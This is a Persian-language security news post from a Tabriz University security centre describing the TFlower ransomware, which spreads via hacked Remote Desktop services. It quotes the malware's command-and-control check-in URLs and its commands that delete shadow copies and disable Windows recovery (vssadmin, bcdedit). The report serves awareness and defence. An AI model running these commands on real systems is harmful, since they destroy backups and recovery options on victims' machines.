باج افزار جدید به نام TFlower !

دسته بندی ها : اخبار ۱ مهر ۱۳۹۸ آپا دانشگاه تبریز 644 بازدید

باج افزار جدیدی به نام TFlower کشف شده است. این باج افزار شبکه های سازمانی را مورد حمله قرار میدهد و پس از سواستفاده کردن از آسیب پذیری در سرویس های Remote Desktop ، بر روی شبکه ها نصب می شود.

موج انتشار این بدافزار بسیار سریع پیش میرود؛ چرا که توسعه دهندگان آن با هدف قرار دادن سازمان های دولتی و خصوصی مبالغ زیادی بدست می آورند.

BleepingComputer در حال تحقیق بر روی این باج افزار می باشد که در اوایل ماه اوت کشف شده است.

دسترسی از طریق RDP

TFlower از طریق سرویس های Remote Desktop هک شده توسط مهاجم، در شبکه نصب می شود.

مهاجم بعد از دسترسی به دستگاه سیستم قربانی را آلوده می کند. همچنین  با استفاده از ابرازهایی مانند PowerShell Empire ، PSExec و غیره کنترل شبکه را بدست می آورد. بعد از این عملیات، کنسولی نمایش داده میشود که فعالیت های بدافزار را هنگام رمزگذاری سیستم نشان میدهد.

سپس به منظور بررسی وضعیت شروع رمزگذاری رایانه ، دوباره به سرور فرمان و کنترل متصل می شود. در یکی از نمونه های دیده شده توسط BleepingComputer ، این سرور در یک سایت وردپرس هک شده قرار دارد و از URL زیر استفاده می کند:

https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=start

سپس اقدام به پاک کردن فایل‌های مرتبط با پشتیبانی  سیستم عامل کرده و همچنین با اجرای دستوراتی حالت تعمیر ویندوز ۱۰ را غیرفعال میکند.

vssadmin.exe delete shadows /all /quietbcdedit.exe /set {default} recoveryenabled nobcdedit.exe /set {default} bootstatuspolicy ignoreallfailuresbcdedit.exe /set {current} recoveryenabled nobcdedit.exe /set {current} bootstatuspolicy ignoreallfailures

همچنین پروسه ی Outlook.exe را جستجو و خاتمه داده می دهد تا بتواند فایل‌ها را باز کرده و  داده‌های آن را رمزگذاری کند.

سپس رمزگذاری داده های سیستم شروع می شود. و هرگونه ی فایلی در پوشه ی windows و پوشه ی music را از قلم می اندازد. هنگام رمزگذاری فایل ها، هیچ  پسوندی اضافه نمی شود. اما یک رشته ای (tflower*) را به اول فایل اضافه می‌کند که حدس زده می‌شود کلید رمزنگاری فایل باشد که در تصویر زیر نشان داده شده است.

بعد از رمزگذاری سیستم، وضعیت جدید بروزرسانی به سرور فرماندهی ارسال میشود:

https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=success%20[encrypted_file_count],%20retry%20[retried_file_count]

یک فایل text با نام !_Notice_!.txt  در دسکتاپ سیستم قربانی قرار داده میشود که قربانیان را راهنمایی می کند تا برای آگاهی از دستورالعمل های پرداخت با آدرس های ایمیل [email protected] یا [email protected] تماس بگیرند. مقدار باج خواسته شده در آن اعلام نمیشود.

محققان در حال تحقیق بر روی این باج افزار هستند و هنوز راهی برای برگرداندن فایل های قربانیان به صورت رایگان ارائه نشده است.

راه آسان‌تری برای ارتباط با کاربران‌مان پیدا کرده‌ایم :) عضویت در کانال

نظرات کاربران

  1. کوتن گفته :
    ۱۲:۵۹ ۱۳۹۸/۰۸/۲۳

    سلام
    تبریک می گم
    تو این زمینه بهترین هستین

    سایتتون هم زیباست

  2. علیپور گفته :
    ۱۰:۳۳ ۱۳۹۸/۱۰/۰۲

    ممنون از شما . واقعا همونی بود که می خواستم،کامل و بدون نقص

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

لینک کوتاه :